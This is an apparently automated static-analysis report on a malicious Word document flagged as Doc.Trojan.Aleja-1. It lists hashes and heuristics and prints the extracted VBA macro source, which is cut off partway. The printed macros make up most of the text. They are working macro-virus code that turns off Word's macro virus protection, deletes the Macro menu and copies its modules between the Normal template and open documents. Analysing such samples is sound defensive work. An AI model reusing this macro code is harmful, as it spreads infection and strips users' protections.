Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eaa4ba9f6a153c2f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 52.5 KB
Created: 1995-03-02 14:58:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 38c85b7463e9e29f29d17443432db804
SHA-1: c68c43c04a6e01b8d180020549cc8e115c55d89a
SHA-256: eaa4ba9f6a153c2f1f10e35243c55f4b1e940b963ff639f0e3a4f4bb04c3a014
Risk score: 240

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic)

The sample is a malicious Office document containing VBA macros. Its AutoOpen and AutoClose macros copy the modules 'AutoClose', 'AutoOpen', 'ArchivoGuardar', 'ArchivoGuardarComo', 'ArchivoImprimir' and 'ArchivoImprimirPredeter' between the Normal template and the active document so that the macro code is present in both, a classic Word macro-virus persistence technique. The ClamAV detection 'Doc.Trojan.Aleja-1' corroborates the malicious verdict.

Heuristics (5)

  • ClamAV: Doc.Trojan.Aleja-1 (severity: critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Aleja-1
  • VBA macros detected (severity: medium; 2 related findings; OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high; OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro (severity: high; OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker (severity: medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the legacy Word macro execution surface; on its own it does not indicate a downloader or attribute the sample to a parser CVE.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7779 bytes
SHA-256: 1dbd3553e1e63aacf2d9f9a52f4bc05be8bc9e24dd4f0be6c95c82cf0327bcc3
Detection: ClamAV: Doc.Trojan.Aleja-1
Obfuscation or payload: unlikely

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoClose"
Sub MAIN()

On Error Resume Next


Options.VirusProtection = False
CommandBars("Tools").Controls("Macro").Delete


Dim modulo(6) As String
Dim n As Integer

Version = GetSetting(appname:="Aleja5", Section:="Inicio", _
                       Key:="Version", Default:="2")

If Version <= 2 Then

SaveSetting appname:="Aleja5", Section:="Inicio", _
                Key:="Version", setting:=2



n = 6
modulo(1) = "AutoClose"
modulo(2) = "AutoOpen"
modulo(3) = "ArchivoGuardar"
modulo(4) = "ArchivoGuardarComo"
modulo(5) = "ArchivoImprimir"
modulo(6) = "ArchivoImprimirPredeter"



For m = 1 To n

existe = False

For Each VBComponent In NormalTemplate.VBProject.VBComponents
    
    If VBComponent.Name = modulo(m) Then
            existe = True
    End If
Next VBComponent

If Not existe Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
            Destination:=NormalTemplate.FullName, Name:=modulo(m), _
            Object:=wdOrganizerObjectProjectItems
End If

existe = False

For Each VBComponent In ActiveDocument.VBProject.VBComponents
    
    If VBComponent.Name = modulo(m) Then
            existe = True
    End If
Next VBComponent

If Not existe Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, _
            Destination:=ActiveDocument.FullName, Name:=modulo(m), _
            Object:=wdOrganizerObjectProjectItems
End If

Next

End If

End Sub


Attribute VB_Name = "AutoOpen"
Sub MAIN()

On Error Resume Next



Options.VirusProtection = False
CommandBars("Tools").Controls("Macro").Delete

Dim modulo(6) As String
Dim n As Integer

Version = GetSetting(appname:="Aleja5", Section:="Inicio", _
                       Key:="Version", Default:="2")

If Version <= 2 Then

SaveSetting appname:="Aleja5", Section:="Inicio", _
                Key:="Version", setting:=2



n = 6
modulo(1) = "AutoClose"
modulo(2) = "AutoOpen"
modulo(3) = "ArchivoGuardar"
modulo(4) = "ArchivoGuardarComo"
modulo(5) = "ArchivoImprimir"
modulo(6) = "ArchivoImprimirPredeter"


For m = 1 To n

existe = False

For Each VBComponent In NormalTemplate.VBProject.VBComponents
    
    If VBComponent.Name = modulo(m) Then
            existe = True
    End If
Next VBComponent

If Not existe Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
            Destination:=NormalTemplate.FullName, Name:=modulo(m), _
            Object:=wdOrganizerObjectProjectItems
End If

existe = False

For Each VBComponent In ActiveDocument.VBProject.VBComponents
    
    If VBComponent.Name = modulo(m) Then
            existe = True
    End If
Next VBComponent

If Not existe Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, _
            Destination:=ActiveDocument.FullName, Name:=modulo(m), _
            Object:=wdOrganizerObjectProjectItems
End If

Next



Documents.Save NoPrompt:=True, OriginalFormat:=wdWordDocument

End If


End Sub


Attribute VB_Name = "ArchivoGuardar"

Sub MAIN()

On Error Resume Next

Options.VirusProtection = False
CommandBars("Tools").Controls("Macro").Delete

Dim modulo(6) As String
Dim n As Integer


Version = GetSetting(appname:="Aleja5", Section:="Inicio", _
                       Key:="Version", Default:="2")

If Version <= 2 Then

SaveSetting appname:="Aleja5", Section:="Inicio", _
                Key:="Version", setting:=2


n = 6
modulo(1) = "AutoClose"
modulo(2) = "AutoOpen"
modulo(3) = "ArchivoGuardar"
modulo(4) = "ArchivoGuardarComo"
modulo(5) = "ArchivoImprimir"
modulo(6) = "ArchivoImprimirPredeter"


For m = 1 To n


existe = False

For Each VBComponent In ActiveDocument.VBProject.VBComponent
... (truncated)